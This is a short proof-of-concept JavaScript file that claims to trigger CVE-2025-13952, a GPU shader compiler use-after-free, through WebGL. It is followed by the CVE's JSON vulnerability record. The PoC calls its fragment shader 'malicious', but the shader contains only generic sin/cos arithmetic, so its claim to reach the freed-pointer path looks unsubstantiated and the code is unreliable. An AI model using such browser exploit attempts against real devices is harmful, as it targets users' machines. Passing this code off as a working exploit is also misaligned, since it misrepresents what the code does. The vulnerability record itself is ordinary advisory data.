CVE-2025-13952

// CVE-2025-13952 PoC - Malicious WebGL Shader Code // This PoC demonstrates the GPU shader compiler vulnerability // Note: This is for educational and security research purposes only const gl = document.createElement('canvas').getContext('webgl'); // Fragment shader designed to trigger the use-after-free condition // in Imagination Technologies GPU shader compiler const fragmentShaderSource = ` precision highp float; void main() { // Crafted shader code that triggers the vulnerable code path // in the GPU shader compiler where an outdated pointer is retained vec4 color = vec4(0.0); // These operations trigger the compiler path that holds onto // a pointer to a freed memory object for(int i = 0; i < 10; i++) { color += vec4(float(i) * 0.1); // Complex shader operations that expose the memory management bug color = sin(color) * cos(color); } gl_FragColor = color; } `; const vertexShaderSource = ` attribute vec4 position; void main() { gl_Position = position; } `; function createShader(gl, type, source) { const shader = gl.createShader(type); gl.shaderSource(shader, source); gl.compileShader(shader); return shader; } // Trigger the vulnerability by loading the malicious shader const fragmentShader = createShader(gl, gl.FRAGMENT_SHADER, fragmentShaderSource); const vertexShader = createShader(gl, gl.VERTEX_SHADER, vertexShaderSource); // Create and link the program - this is where the compiler processes the shader const program = gl.createProgram(); gl.attachShader(program, vertexShader); gl.attachShader(program, fragmentShader); gl.linkProgram(program); gl.useProgram(program); // Draw to trigger shader execution gl.drawArrays(gl.TRIANGLES, 0, 3);

{"cve": {"id": "CVE-2025-13952", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-01-24T03:16:00.360", "lastModified": "2026-01-28T18:33:18.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device.\n\nThe shader code contained in the web page executes a path in the compiler that held onto an out of date pointer, pointing to a freed memory object."}, {"lang": "es", "value": "Una página web que contiene código de sombreador de GPU inusual se carga desde Internet en el proceso del compilador de GPU y desencadena un fallo de escritura de uso después de liberación en la librería del compilador de sombreadores de GPU. En ciertas plataformas, cuando el proceso del compilador tiene privilegios de sistema, esto podría permitir explotaciones adicionales en el dispositivo.\n\nEl código de sombreador contenido en la página web ejecuta una ruta en el compilador que mantenía un puntero obsoleto, apuntando a un objeto de memoria liberado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.3", "matchCriteriaId": "99A33CBA-49C5-4976-B668-88F87F0FF575"}]}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "tags": ["Vendor Advisory"]}]}}